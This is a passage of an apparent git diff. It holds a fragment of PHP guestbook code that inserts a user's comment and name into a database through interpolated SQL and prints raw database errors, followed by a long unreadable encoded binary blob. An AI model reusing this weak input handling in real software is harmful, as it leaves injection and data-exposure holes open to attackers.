mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + + // Update database + $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
    ' ); + + //mysql_close(); +} + +?>

    4u#;Vj)%BnoW!2_{KBqre)kW7Dm4#cO-9;&bNzv=ji zX!N#sKX12;qA_p0UdlPP-CdT-q`8eD9*U7JGd3|%vq%t`?f=^VNu>l0_76d-DiYsg zjTY#ACa(&cBoRLJ0xGFTw)VY|F)?|m!)o``lfQ^45QurQ*_vc1y^r~qgtT1zYO*G- zNc1IVXyq|LtWk`OEL#2MhK399j)42^zdvdK@Y4S;3H-GMrALhFD7(r#;8{rAQIYo_ z18CnFW0QPnufNenzze#_s($piIm^;|FXN*@-e;ALY|BgPHff{2NRYd2dv>h7S4y(rn`nCHK8>9;m}?1t7Mgefc-t}7BGPCnOlF#O8o5;WParj!=*3Fq>~ zg`57DCXnapZfU?o;6H2OQhO5^G5jX&Ie5p_00f$`9eaT`HY+2wuG2?7GQw^}EG?U+ zFs+D~Rz`c>rYlmzi7si$Wi=f3b$65}T4wvf+a}+e96a>Gd^*}p8?P62r{mFMe!p}n z0P1#30L$Hi-KC(0$1uE^P;qnxhcoj35}fRjd-7vuc*!x9gzd)j;jT$1c@Y(tWwH#& zn;2S}23uXl7y{LCeZ-DBj^afY{L@V==@%VK>tm&6MobycP=8vRm?p|OUbm5*!S|k+ zz`?fkmL5&ua8ZU*}v|b2;AIV*h+H?A(=pwo?H}G0S&(pfbS+em1Sb-!Ydjj8Pf;X_iQS!Kcxm2I; zN!GFbScHIlqdp^tl)~?%PA|k`TupI%f>l!SsZy#7R7v|u%!}5UwAt%t&gxY=W+L88 z&;v!%iAF`-8Belqd7&_)U<2N#ikD8KDNSFsbKeL_Y@G^RG&knPq}6-99AD>Fz~v%G zy8C^-ZRkRdjSu_lmo8kCHJ43Dx{djM#nhwo#uAOuC>N?t-{MTT=4zaFjKzzvnBnl- zNhkRgxIkH=$;dI=aWpC!I#H2}dkTS6|NO!r>WK{Ta^(E=QT9|AM6M@s7-EUiweh?$ zJW1+%;+bu!v@pi{5-h6UM%^JXawfsZ#ybnX^!7lICm{x{*WF3rbSk2rj1c6Mm?L!c z6UOg`0^=#){44>nyp1q)wAXS#?}*PI)Mphtd)Ylb&X=`hxP@6;D5FMaRaa(0>lT#pA_CcGau5ilO;! zS{zot#=m-cEK&pJ3zw!{w0np~o)B7Vtjrg;wTiXIBZM5> z>KY9S*V2>4m`Q6qK@Crp?=-L#*d7>E9x81+j_2fooDxZW7)6R73k(|EiSvY~GJOE| zM$FtS(5d~d)qKHoh#H;8tJ<*Idc4aFe`EWnFvAgU%?G=&NuTB*>tvRqQT5Ly ztqI;rA~7BuOcphtT6=&itlL(l%(DZW5&grzlk+n2B++>)qv?q71Oxb+i8DW*FaSn# zGu8>D>BGffx|%Y3C1ZRxv3IiZgE)o3*Sc}Qv$YBb7HVCeMkkEX)5}SRr@wVP-OAPM z%B-!m0!H`+*6eFU$B1)oGB;2{lsC@C>XI)4JET|O010IQoM!1sZ^63J`Zs5j>f42; z$(X{WmJYXRHP)5A3nmV+I;#sJi$FOecMs|9(YD)XD{H4q9N|d?jO@E4a+Tx*1QkzX zH4Xn|Q99SDBNv6dbWx4+5)5Op3|-A8us>5EI@1<)hTYKiEI4>aN;*9!lX&X2cJ>OKrp__K(>)iZ(e7_Ptm-b&}w*ni`d5j@s!S zqa2P%4OIrCxlKc`lF(6GO4kEQ>f6v;Wq=$Auo)x#ltoXk#?JAnFH}HqlBAGgU?1GL6R_T>sXzg|O(tL=e?kZU*+ zzUplGy0+`e;j9eJzzxXfVRwBgRwqHcYMSQ)a3tkXz73z=sD%a{8o;!2#aSVT# zi2`*Xljj;EKX+!)S|QYs2UV2(WAb6h$AY>g+{afL0@tiPm53k67r_e=h8ysQVL~uh zlJNr^1-%F#o!08m>JoyBvkk?Y+Ly;Zm8iL1!V%df%wqxa%W2`bI)cG$Fw#>eFjju+ z&g%oZU>u6f+NBR4X9z-K7kIvJ{~@4b!+h9CcgEOeeW>h=1+lZllMGD?xo9;;tbkW;0w<1w(=SBHOf2p+j(^&miGe z`#s1W?}|Wh#fC!d`PRUc9h#PVy1*$$4~gV!BmoubGe!IGU;gO3*aIB?XAvzlcf9Sq z7K*e(zMDA&!-K*hR3rqCUY_r9IJecl6gW|>n2GtVt9BOhz2;_X!p)IW9?si7o62yY zb}?}I&guJY5;s;(tQP+56d|9Ow_NYiU0JojKUO?CN2pbpMD){$Eq>L*x22f-MDLQ) zT_2VTT+tViK%g?n1KHe6>GJSvEXbMrk!qd1|HWX7WonCMgA_BpPScf&A6s0E9*p=@ zn=N&qbACOmOQmARZ7`)<^oXRg`%!;qJrS|qiNopMD>>yCsa(bI1Nq@6`X$;)7e_98 zgTErCTsppr+1!(FlH2D8!A8OWFqh5#mm{=eRO1&f81N6}^_E)WA7Fg%rf0F0B?V1t z@$k23(wT+siAXWP0qbhgustl%SO&Lk8}>>uazlk3Cn9ScwNoq)XQ-0O>@2to_MbZT zyvk`e`MTw(?dzc|oj3`x6>G?d=t~aF*HC-)Yjk#q`XP`+(qHPZCa8-DR#!vB6xp`U zIXbkaWMMj?b4JwrF%+@&#rhMgf@<&^bwjuAz2JeoGg5C>k1tau8GDx&kQ!)`Qm4Ym zku|Bj^Z3GOuhWk0cb#6A*5M5Xo-=t-!7f|D`o7w-)fed^4_3U(H{DE+&wJ98rlf(6 zrixrunUA&__nXesav>XY>!wpe_p7l!6vg4Nfhp>7$_!n9ee--QMb>BC zOy@&FY0;#E$tq#AdWg{QiF?Ym)={oABZDFr?l*?FE{5OE7OM4dQHXC20%yJ$Jd{)J zd=XiqT=@DE1RE`jfY>wg=+#(%y+ZO$N4dxgyn?7qI-7Zs6|=*lE$dd>{N>j${O!ix z>YK>@YVwoJRoh46dO^NsnFHxgmR~z?o>}?wt&vK#B1W=Ne@$l6NjFju-4?z(y2}b* zq2oErSlrS-0jEq5ma^;Qh4KwPkj<%CZOG+^E|DoJyAD)ts3g!m7gTIux~XGitnTZs z*_!_S@|}(@5?lE0=BcF6iwzYezOlT{N$gR6f|&ucgghPXI3uqOlU@0Rp55lWdev~F zOXQ)DL|y#)`)q_2EtU?yEamoraOEBRu5R~Xf1CN|WbvjNt-6vf>a6XuA9rv3o|m%E_RpO;GHL_f>_@5FPPOQJB>-7>z!5AZ|flT91ZMG36N5if*dv^$imHSps2{C6vsphHwVuo*3G7WuSDP<6@UGTf$S`ltE|SxX}HGfo}XBt zA*j(i$vXu5G&V2!9N^;DMfA-Xb;QNk96@T@oY&*0_5ZD8P$4U!{6&rJSvB}@vL{2$ z^ikhN6YLOI04^C>*@dnM`qFa+LJKTpPe@G z2@IS2eC<68^NI)!xEVPf&5ZLkt>zP?qB#kK{Vs50cL&U$)ISj_39)J{V%-eBTQFL{ zQolB(0sodg%OK>u=l&&#^rLD&Ny`R5Nb+8}k;ly$G}Q1(AhP#um#Ntvoy{9T2a4S$9O# z@hlP)e7mfg@;6}M_2xO(aLtuv>ZbU)g} z|0gBr;$8Z+cj1<9!wC51_>adXrjqvj8)@CsZ*9llZQm!t_;!7k!)ZNm{dSo7kFlE#FfhNw;+(YF4aXnCuLdP0sDr%-h5IxTrJfka1S$mP* zqLOlpchc)u$n=3p1rW7|6`P;?P#4Rw^{OAUGH}<$x!JA2Y0kD6hwU>XYx&1n%71xn z;@Tofn;?A=x4A3%*>J;+Xc(dM|4k~c8r-B9^*tfcl* z`;gWj&@47?oqA;sKXS^f>e*V1$+`sJYttOJnjdcderP$>zO&TA zh|g)|NUu?p@czy!K1)&m)kODm)N9KV$=`fTrPpH9bg9Olru)Ru5V0@JacpiP$^MWLef+WNI zc~BmL_=72)NiN2=QG6E6b!@_vVU<_&mlfq9q@=JOJ>E|t>>;B)Aw`&qNHK3EiB2>%BY;++N-ag{2ybhPJJ(An zBBXZ`YMoZ*=5$>xjjKJ%e|H_iV*AM|x$v$~wVyJ+YCqeg%MVqt=6Z5_vWEd(sHHyU zN=hTm_heE%!-0oQ4mJ?b7z{5$J~aE~L%ot(!j(+(q#26Jocn0L+K8XA0s`EcSC z=|{r?nJj8cC0c>=gB4g;FCwDmb$PytS9esVps8-5pt>5ig&Rwq3-T4c(2)mb|$Gkc(GzKLR#zO^GZzgwyX6x*R>{6CxSNrpcSwM)1h%n zy4lBg+#Q$?9Jl@)wMA0^SmiX7lgIRuk z(qPQz2|*_lc8d#`Z=LISGw-;=&vm_TZ4btNt_a}`D}9q6mX#ASDC<|($$u*!|I%-9 zun@bO+zy2Drfl*R3Ws;l7_^C^>vuTugO;0i>GhZ9%4j4~Mg%L3SpGym7{jxsOMiO? zI6rkMWfC<{!MDDkdPc@w@9=qI?9s~~coXc_H{V#2m*5=1V8x$%I4PqMBn%Xaf18U@ z5q|w?X})#|{sifraK`TEuBP5OqLH7!Z z8Zh;ZvX)C^?V4#_lWx7TN9M8Y$ij>o@e*599FNHoq2Q2<&a@&FE!iV=Z$DTLuEYi^ zy;{vz(y^0?UFup8Rz0A9!t%Uj%i9gB7U9Ja>!ph$X=rVJhoKmWir~=o;iEC8$=;V$ z)tG)8P8)K`Ui6esEdo;6VOje$TgVz*v#uLcZB$#EkY|f7y)p)Zt+CAa1N&#a8;65C z^XG%*@Ie%46T_xs=l$b!6Fww8a_6z_IETF;BBA;L@d-z7O{Ew=AwxFrcJ*i-G#DD~ zfoGu(!*Sgn=i@}}=ItN?G^297e#G4{{rMe)5@RGU|FHjPS-0F%BCd@ z{o@dQ2zVv@_|M5+!RwJ)-NxVVGO99#8e6?`f9kqv?jrzqNRHqUpc?{?)@eG3A8&(xl?^!S$cD}KM08$QGP?F00);wJ)i4=J5)*c*$S zdTC!{Yi^$&u@kw2B$oMRcUdJlg^E?@RUZ`}Ke0LO`$d~IVq71zUDxue28MbN{v$nD zE$PL(fRn~l@Yf&RKs=dkzd$BnSFh)P7d}-9 zO%wg+tV|2*%Gvn2M*rkdaM~q^8Jjal-7EKUeu>MeD!K$dq+X!H#+D4)3PIdPksjx! zwi*?aC`|K$4hMfJZPbI?bLRExCIZ8>hYxlulyblHy-Dt;{(;g?kDH~V*3u}jK*8-|mO2@88q-1y<-Dqi&thky z0@Y<3Pcqbc(s}-9#WHbW%zmNFdDKi9iQPHL&hPk<`<;Mqnc-$`&&~aVPms+?MLyk@ zTm6@KKOd98(xHqk;@X_Wu>@Lvn0(E5$cUzgvN5lvJiwd*aI`5$dY$Zc4v{qxGR^!) zF3?pPyV0G#EInEss=?fpm$V%2+s=aXAFHkTCYQ+hVr_$jJvcnKqG+!oO7FQ?1{p1P znw-{Fy;?Tk9mmIQ9!z|#Ij8N&4A5hJYHi#Bxg zaa-$)7yQ}s`UCx<7aZlBUF-F{rTgBe3)bbMQwJP(Pa^(OC1)&jf;K<6z{XdxpN{OP z^hk?7iW{X<7ZN552YzbzoHwOO@xYB~wQrLD5aj8Bi5pj&hr$d&YAxMb9b&ZzX@6}0#<{cU*TGk7~Yk?kdlJxv(1QzCv3=oV<}A&>K@>X zNXaHZuOW%VEwOLsMQsjtWjvt0g0FT|92mZOS@=w;{;DCKi(rXw&E=Lz+&N3H;6fVW z{C%l)GP^9=JSV~N=ru0yz797T{Ze+V{mD;Q(Pn8&uj%t0s1*~EwYLwgI^*toohI+y zm+Eka5z3n)BV{!GhnZpLgZs>@6KGV2zZW9n`Ti7z_JyFG+`&6onD(m?o%1&+wCoxr z3{GXy6#mo7>1)Zo$7}vM(*+@B2pQ!*)@XED=>sSYy)(G3aRJrrmb1JbI!Y^lmCBGUeM z_U#Brq7s&n+Q9ll(_)xyoL%TXo$^j(;a{}SkJ`vxNHGr;H=e_CG46K;E0o(((E6X= z9rP}4=9@jLJfeA4^rj1woWicMnY|kt$ls|DdVP8)yMX>@Yq$P;sxV1`Ag{|iH@soW z_Xw~se!?X05y}L-E(JGEk^O|%h=B6rtlNmUd!e$Yd@8Lodg`8VuVTu7LNO4^uz~Z; zPA5k-g-+@f5;k>hwDleeflm7O8ehD;y~jf>1b~a6a=m!{(0p)Yxm%Ff*_V-hO;CpP zpTqw7I2H6wE7Eo3_BLz+oGP!cXzx-? z_G+v<%6zH)F!62NS1DK{*19U{XJ8iv(M)mU0Z!I1zCPw-l1X!8rXLUN@1!mj%Ra3chBT}@0a9UDfvv=TA4m-u5DjaRj7qxH44 zh#$1SmuNkSyA)?i?J};9{+fomN?cF>sQWKbCke`PKBJ1Z5sdV?@_s){kVN`yFE`4_ea6R4zr=eREA>N=SxdgG?07;>TF7@95H2sZc|8_=EvR zmHcT&M9!-CUH@VKO|JL&_r)B`GDC)}hN7j!Odm1nfUvNiz8nnnr`fo`Z!hskK9{;F zp_*lpw_@Q==1B0q{Yi&O>8`U3dq{O``aLF8o(nTd{RspIiczk0q;dG|sM2LBNeiC5 zbWGenZ;+5(#vP(;m;~Dibh14&N`Eq@-)B;3)3KU3zF~RDYZlU0ld`cwppSkuKIuMC z>fAO9(GhZtS05HKsjTjS5wA`s#1qT6-fS2=8bYwpaig3ip8a* zs~^JxKr@70``n*Z7fe`s1d8;MV005Q@tGCh1zAq^;VO$h^q;bTit}gn5eHKRkcYw)MhynXx-dPT#E?U5|*jsoxym{psz-=exQb zs=k^gMphn|*-hUVRGanmm8FnM(RBHMN&8-%(0a8osVV?2m4ROW!KIn}W@0rVb>*TC z=|+24tS8Wku@o&Qy!|pH5>|)6A&`xpFy)Zk3>eM8vA#s9>MYE0bU?(7 z`L)dvoVWd6KXK1rF1!&en=ijyl|(!}zmPv}!Ncy-aI7pAIT4zX+~!^au^@VfO^A~A zlT&Ve@iS(FhP1*}m|T){WV0NWo^sju-Xq3@DAq~Sj%q_s%Q&j(Pk>ox1BbJIEMZFE zv|%>DbTL$C;mh~iZFE2Up6*cE_XDA)`JM!bVzW_H`tm2$2=*zjJQ^}oaX6o8@WESi zH)P$-@w-uhzM957P@@R*@Qj5L;)ic8CA`Tqy$mVELUuL1ItF7X|1_QY`|&ESPRa1?i9Axl z=QVFs!nu=t2{cwx6aKV=SUsA4q4tPToYVfBprx`5s%?#17jgC~bu~FpD3SL^#X6$4 zNB5tbSePzXV`iL4@EtfH`5ii@pAStw?s4*a^F|YQ=KxM(Njz8-f8Ns1z<2GWa{P|5 z#&#s{H@0@+=7z9g#9Y%{Ar{3I)ZqML`viR4wYwy4dBh`D>MeQ704%=|5NWepJasf> zeZxS5R!#OcQJ!>_=&*gCtC7{b!g;ZPLd*SXg}`*_g`jZf@We+Tjm5!!)8x#nx4;?FO0(E_PBoZ zxRS{hjyCkkd9HV*E?78I#6UzaSVgbQmV-8pP>XBwG@_?yFdPZ#yx6B)q)BhCv~A^? z-n*5~6$`gwVzun)GuUtPA+&E7&HQcD3Cd1>b?Y|M6(YJE&MW6qgm=wSBMGb0IPw>B z(QJt#WqsA5roV$_5Ku@9ek&SbbY9PTr1198fBDHiF-Gw>kB|IH^?LqqzPjbLh(NvcEO zo7As^qvi|G7)h)#5lxT_{!M8cGb+hxz2+P<`$xLVzQJ6*dm7TtnnRw1=d6Ue#|;>K za0JmEzf(_Zo)SE0v1MsjGVt+FZuP> z^-BQaT=}!xaak>$4ojr;`TAtkQLj?&7xgvSR4-0U&&NX9sY@%Dr?hZc%_E3^!_h#_ zDLJmdIcr`s-l*2FgZdl7pgW2aAM9?SW2GNo^VV$jDrD=3ovu)(fZyxU9%AVhI zDV)Wjs5xoO8oZ%wh1*5AJ*Kj>nYR*I9`1T_sOS+B6EP>kp2B@^#NumkJnx@V9oNIQ-hP;EF+2u3*^5Heyu=Msjxdd(Xqdh%PX3P!zoys zejoHXGWI&l1%0<{?H|mQopDhAvf?P8l)lfyBam{Z0pIsio}^Pho&7g-GGz4I}_>Vng#zxmruBDer|a&Nl8LT7!7ohdk?=UpWqU zGf;1EoFE}phzm=aSb;sXKTMvI*83wqgOF<9eW~VCYIu|8Awh~lq64#%G_=^^I19$R z8-pjQy2si|HaS*rm{_eBSgt5XQsZswbl#NX|~|E zfRhISuL?)WO}^!5l|i*C>TW=YtV9(gV0l-NZHg= zomIXY$US%cX?Qs%yB!~4FM^{82kNCv1t8cxs*a`?L?ZK4h1=&u3=-pqFhZ9?ie9Pc@Dz*MBfws9$ z89lT)FPr!jJYJHMeDn;nR`CP55vOc(_w6!*-3A(kZ-w2wR<1QS`81?~Jm-W8x4L2~ z>&cz6S5PWvL0B5S_oXguOB`x%QW5K2z0&mp4&*V|p5%W?y-&L>v`TvD?cDNmLAx2S z6ZF9|()UKb_RABeO8QU}(jcttNI#jpg}M6TWZJ0seD$p?_rr@$+gckG=h?y)UYt<$ z4kC^j^e}SmJ$HX29~80vVuZ@IonF8ypd}PHq_vE%?6rrF-IQ9Km@yHAkpXA_tp?t( zzPwui8NLd6`w}9r+}LmIjg!FL5S-BKGi0iN(RCDdxSSzD=*NVIaWmF3_2@!TQC_yi z{o4b~yDlV`EgxXT2xM^_2i4Hv&aF^^^MWMudD(0M1E>9r=8ypG+}~pv6N>u@J4iiZ z5?je_$eP)W)_tZvm&$m?XcV3GZ+^9MkIsY9CpfM8!g}5(4o*;CII>UjudrQH${PSY z9S}6H-bG9AcsJh%=^8>qRa6fQaQsY7TjCknBG0In_dZ~Xr+H}7?3+`eVOd` zHX_h?@%6Uq$05__Jo=1GH9DY~(bLxS-+=&({YII5X(9J&8yvFG_VqBSkA3s4GJMyY zn(4t%i|t0nl{M+`U75z7Dw)tkh&5C{Xi3P=QSWmL@jTRst+lTg5&UxbG2E=k`)SD{ z=W;zaz;2Ug6FYqiK^CQ-(?S8dE9|kA>0(H0&1g|RL*fcl|2j91@^5YqMMRcF2Mfrq zMh`F&`_fLRmpohSPrljswA?9huYF|&)|(YS@ej+;hR2GeXn9{L!yX zOG|38F!(pTueDv+V;@b=@L4<3C}(r&_!vR_5N<%$t11Q05m7!bxgzg2KEa>1JZJ?F!9(EPtEUBez}ghm`Y}TSod~hJV9sWU25CgH@XTD%Y{XfyOE1N%YzJ zx$UcN^6wwsf(##-n}yb-HQdHp`vnC($fCsOzv&T6$Q^+OKa;UZieD&iP%_pWjZU3; zpH}TC(Y5inm`q~kf+Du_X1|;j>mjAf;Yn1zkxk@35H~I7mG8@W^Kq;z>1crBt+VGh z&DD|3Jf#?o>cPkvkl=9VANAnzFkOca+ygiujdg$G;m%JTzvHg!_J(Rz83i;`5vmjeINQl2eN?FeU52Snzm{@})=6ZLvMy878Mgo(|}ha{%0c-rHgH zH(V(<9l;T|v73Rg7HIfXtn%z;zZ^nqP=O?o2FW4Jv=8JNTb-);L-35LQ0jTBuH}V# zR@6p1DxNXlgFNx(O$^kLlSy&_ziQ4?pz~JZj)+r}wdOEeEgdt3N8DiY9C3OXGfC4W zp~eD8r<5>V9d7s}`hDp%-IA<}+f)@nKlSyScnMaTyEyb%b2hy(kkhm?!mg^14V-Y_ zCqtQ|bSyl1e+`E$?-t--SjL;JKSG-Abb+9F4YEqI^eI(_r`l8&Uod~FAMJZRf}c>dAXVWb)5UMHEMzbI#YQ?~%Qkgb zrZSGpiNm)#G`C6??+fxB5qL&mk9JJ`&|5nFi-q~EGEb$$EY_-vbUr7C&^0W z_avDfNnffi%?E6UcR~lSZ*DL8FbPke9NvZ2%3zv52x|1U!Uv7#V|vvbQ~3~LbPFs$ z-C2sFGw>~mml~zq)+*|F3E#S72M%`VjvkSF9O4teX8zC_#F%&gppS)rgOd5wB5(1I zV92$uWYXH}LB}<5^6B0==Se>3>-9B8M8YdcAyS?k8atusaLLCnXKKMQ=dY;^)n{N_ zx8K~!-g;*E#b?3a85Txe{JAUfCU|ip#;b#i;HgT>oy{X|Bj*59z2a*XkWz)@vm?S8 zuL=w{1ZZ-_oj$b6r!vv_m&$%shEUa|6(M~n#9v0?U#4C@RmEJ$xQ~Msn+*zg?3_z9eIFVs8eUv)bF#N%@qO$1 zR)!hwEqXxt=HR!xge{c#Ji=>qSUgs&8|{fdtRDIsoX6JSm_=|`!9GR+Q&K#I5eb7; z|MB1*Q(KH~<%es^gFUf)m8OEYT{)0hTVJua$4%}r(SWn28&AA9q$5b=UMqc8$Io-b zYYa4?Uwj>@9Tay7f+7+CpT}=R z{OZC$WUvQ&j^VY#lz2^ZVz+H%KbH7a!-jKz_T}b`mzyy!iG0K*!aJ9h$PdQ-y*T18 zLp1giy{ZS99E{tR)fp=EL5|kz_3f_Gg&0?<;;-}3AbOs6tDI5h29<3<+8A3G{`x3{ z1jI;^vebMrwQ#Zl_5kDn+(eA~)7dKEVmDS}7u7`@L* zqwzj?6;})C9vA{R>F$`{lUy2eV8BUpcQ0}C=no}O)h>ka@>u9s?$!-1_hr&R+LTkK zK;1H84KJ$EIu-7YZ>PB)QZ92{+#xT5{Gucb;oj6l#wK{yL05F+Zuo@tzHsl{cSc&^ z+hFY63FCoLFvO{@gp{$L@+q0K1P!9_yDIllv%h^ZHAk?n#yQVRmU2GB1U12!yDCl0 z;!LB-%jdRm1mCR6Xx2otm(kR9LQVpC?@z;t&<0c>T|x@x871jr+Fb6U!~A9Rr1?d< zp#)4!7`|UTp4jRcc<7_~8SmUWbb&zN63IzOsDJ$JC;r8Dr?@g4z-He8X&6lFL*W3` zl{GhK(EMup){L*fu-3Y(g<1{o0zoZ=;OLR1EyMrYw?H*#!*XGgdfwo*fFV$DC9)iN zrV=tH_Io0lnP6|Rbw`;g!PljnSNtk~xak5T1S9pjZ zrpQ`eD;_hq9!*&I7hO3S;*_3iPpF9F2pMH>B)EZ~$H8(5P}I!O9IJvAyia=;%Qn9r zWZ|x2brA^%)#EI#M^B?h2b~+bcF?fbkUt|`)4+<+qs8QGYV7WoM&1CRbAdEC-~VPCa^*=$*sLa= z&tz_;zBhyGfthwFB=t#SjX`i_CfyguptR1mJzNYKm43MQ_-uH~OmPY?4r>Ja$cMJg;8HdHNYL{hp_?e+XR+GHu&Qkw3?Hht%0Uo>9MfTbrd4BTR@B0lJP>=Yethi2BRW}q_VH#f zjl9}cD@BdLJ<({gQbZT1`6_hG);Q1u12w%gaOFzQxmMN#e_vZ>5SZ*XYMc3}Hz9C1 zna@#lM?aS#aXbYtFg4kzx4?PHc%$)r0Y@n)l}qN2p?UT#<{5S)MM4^Tpd5u2yaw%%(6|T7Si2Y zM#?tRJgQy%!BEtfVwt&JQ{u}Ar-UhG46gUr3y)&nx1$FJVuTtE4)d% z9@C@8XA2LfK-o{ZM2)P7=szRY$k}{+e59eN_>p*R){#xk?H(WRa>L>=024>eyL~a>kicw{dWHS8>{a%^ZcwoXql&%zMmytZAj-B=}wA124L65KIL;Z6#ht1=G zMrbA?aY&tFWWY_l4anJZ(Mo=rUeoT@g6ThfKZY1zn+pWYmsfA$$l`jNR@swy859EZ zWN-1ct7$3giTI2kBpNcdlW9eTf>V9x%b7v-yvjCYk#5IUF-zx5#RV!5A5p*gHqiBN zcI_uQ9=>FL(XihaP5^hD%=}ZYlSu<@`WNQq#S71LRb@l}i|6W_Q;YZ)=3q|vAz6oE z_T)+Vddvb4@coAUz ztuSA{c@o?^r~u@N4Q5s1&|J>}6%OKG_BX^jvKA54r*n~*z;u$X>*q}lH_MP+{?%f< z0$+UhNL@0X?JBAD_TX|Qa<16c63#7OWr{f+p}e=8ZiNHnlV*HW7vyg24!aphK<=^6 z=+zm>Vk-ylxEf+IkNz#rdIhulXT(*%)r%+3hXw_dvjSRSaEUjWu~Z%Rf&F7o zfp1;rRxgEDPIG*%f4w0eRVw$OM>57z_NUj7=M8@OhL_be3-3vd=!9pq;{&-(Ui?& zcYJmlEMY)*i6S?A3W0>aMkK?=#my1E+<|39kRYnDmb{}#xWdlH=mUdBn`Fo5nwQy_ zsa=MQp0n<<5&O^ou;s7yp8^E0)6jkvbv$JQOz&Dx_M@>XMKi_`)q8{@LOnepucL%0 zoxwh|D(b&1L-p+4)`RHGW%QxO&}GWN-0Mw`CMv~q9Qd}!U-a``QxSyl9+gJkJ}YZp z7A2kQxKa)}-W&Chz6T46Dx5Oqd9v~ipqJ!bZ44iR zIWOI>2p7DBfPL#u&J`9uNC@zx*MTGIWCwnUeCZz3+99N+i8bluHCQhd4FGjCo%)0FLhV`Uzgv0>j@WUE(Tpp*v>~nVN z4+dCt?W)9`DE&lr@qj{NLkAaWw%?#UqBV}@>T&n=|t`Z_E& zNXyW0jpcaLi*Tbec#ez$NcMj^JmDdZq#7&?)lv5eZMG|Gw}(p@K&2C%)m$|F$#_+0 z{2q2xweGOXUh?W^NtfMS`q>S6Im!RPbNga!`cg7mKl>egkpt4x*A*WCjpsj{xuP1k zRtTSsn6K9r5kY#?S)ud!(a_eN_1&}9mvU{99!Mz5rB`a%G7;rizeOF85Q$yib67t; zYXOw{7;tyUQ7znFBtg>|<@Q>{?cqTHv8;_+-=sN+gAhC46=ooi^r^}5$;SOZ&HerG zKLDP29omnyn|iZ2jID~wG6*_E9;!p$*S`^D>?*n;&WD+pKc94;gz1ZYuoqB_CC!Hy1!u?)1~xcA3L zoaY+T8^({#>t%$DG?f>c<{%PWUK{j2d`bmI_ z1CtIdDR>#La<()}wk~M@T+z+*hPZF$q>W;8visFXQt%l-ySal+{eKQ&y2GuuT@-lJ z7dKA-pXB17%N01vQDS-$6St@b*a9Sfof+ln8T<*Rvz7OXg3i!lVW`E_7UN%v4&Yk< zJ#$SSfXywJL;@Y)lX^yf7R~u1W08K0X-NCaohk`}3b)Q}jkUm8#{kLR_j`buweW}` zF03h{*MLs(SuRdHDAQB@<-u^Bthz_&bPP zu#MapRY4e*ZW@1M5v9%CchOt6umk04KLjvwOdRTv|_>HgyNB?-W zpqzpb1%=0=X}TlXVxzwcTEwcb^WwV>~G>hMgGvFC*Mp+RcDbe2b^X5PW*BGot4gG@Rf^bj4IChp1y*EpLjxy&Xt9yd2 zERYK=r+R)Bw=+_n99H}t_Be?n?y^gdunA9&Oyo<5>w1$dMx$&zKCjUMwxk90{lH~r zQ*6-5Lhv4_kidRJPPcSidw)J*Vv&A-@$BhD)funNFVQkczsRP^OZ=smNUnXDW%`t< z?aMEuZX5y503h?>d>7#xK;)5hDJuk5%?KK+$rj0scw8bL&d8IBO(|`QkZntLTM|e^ zXG`G`3z~brFZ0v+5h^d(q<3kPt@nWxjp^%4<&*g8l^5-g;XL0x3eL8A;rr&lc~32i z=hnp#Zj;Iv9KIADI#AwU)BGqOe^h?O0?-|$BC1`S23Cr-HI%fT1J3jm$;d|4xe%7| zo^ry8>O-A&-v3A~j((PGH;nsm?ps>y+&3&kYOKEmyG9NE)u4D6mlsys09bR(qSG9P zMUV`8C`|iV`Iy6v^Zop6FMH%Ha^)x>6cFN!y)S)S-~I9fR+oHt@TBC%wjXzhWUwVm z1QrXMR)I(|e<*kJc%OgNU3qby!g6a;uBtdvc9TETbo8&KvTrR))b!9(TK$2m5=gsY zLBhJGu>bj`T0-ra|Fc&9%-7xA@&c$vyMyAkN3jW8w@(WGQKpcTlFj_OUV)%`JZ@kV z?nPFm4sFg;^?ekhl6R^UQsF{{T01fQwQ5L+%Ux1Yekf#=AT{ihrR%t*R)BLtn-%q1 z@hsRa^6#WPC5lvzFmO=I&bIL(bj@8J_>cx)( zwrEwl7Y`@0d!Xa95EEdgaQHJuaDNBgB^XyGWw?9`n}cOV-eGd6?0auE$A~7Y?|K}` z8ATD%N2*<-S7vfI5rmm$+sa`LATHxW5gLY1pKXTCJSr;shEge7x+LP-V(I_Vg%)3i zAm?zpf4z!E%{$Ua6mSN`IQ2ds&k4WD5#AfS!o?x&+M;w?my9$wq7PqU4iJ%klnR`K zPy}NBzF{Gam(m=i(FgC7D#N2b2{HfC7dqR@eHzm>%uCD!Mdxh zNi5M%$q~Eg$^b?r&fUa(@o$MnL$y{9a%!5jfZ}>5Is`UOQTic^!mQmY+iv%xR&O8- zP9S}I+QLHpv{A$Lr+KLcuxCfX+YwK&hQ1k~;j&J+h5=NTe>_RJeVPsV3bvi%-`4Yt zSj{<2kAC>L;AFO#@<&_3_*NiwQ9zV$RZhB6-J9m1ZCgnS6%%E_Thpb)X(DpU#FHDf z@w8d3dY%=2n&2?z{gockKx#Ljc4SWC>c@LOdboTr8Yd^ik^UO5(S6Cs^*Zh*Cz0gJ zfwVfL_X`TR5?J3uhdsS;AHwc@25jcbp+yu zSHf*z?ATZI9lL*wVrwnK-i?i?S2l@`5o&}8z9776lwUlvSPrk0SaTv6AR5ijouRZe zZ9dl49d3p;<>YdcigpiI+s0^BFs!9-k!QCVF z3@&9-P%8Z{d!&wAzW|}@WZbEMl+1rnHfnNIXobX^F3K?7YrOG8*R zu+(D^kDtydnJ*o~GGV-qm-6r*LhG*8dPkBePvlw=u!vXt6broLlvVQfk8iPCFDPPS zDK`$s2X_7C>U!>$%w5386)Duy-RMM`^HCd=L8obvUYmg&-2ORQCOxSg86M@B z5@4~H9Z-C&`iD#?H28XjtrxbnJAnzD-vYeDRe9(4UcAC4c2w3+>GcuRk5RsQr{e_=Zp=0zt0&3Lymk87@1LZT5Y3*&d{urObfsg*OAD+X z&Ko*{Na{aDWvio_G0?Pq;7rf}gj`&g8=nVWJ|-m%_3#f3awa!W2mtVr`R=2jRrNPz z!8{Ws+Pkep^AVEG_;U(-VGRQ#$X)8ezytZm6*%Lz5UT}x%_{!s#@!E!@9{fc^-RvZ 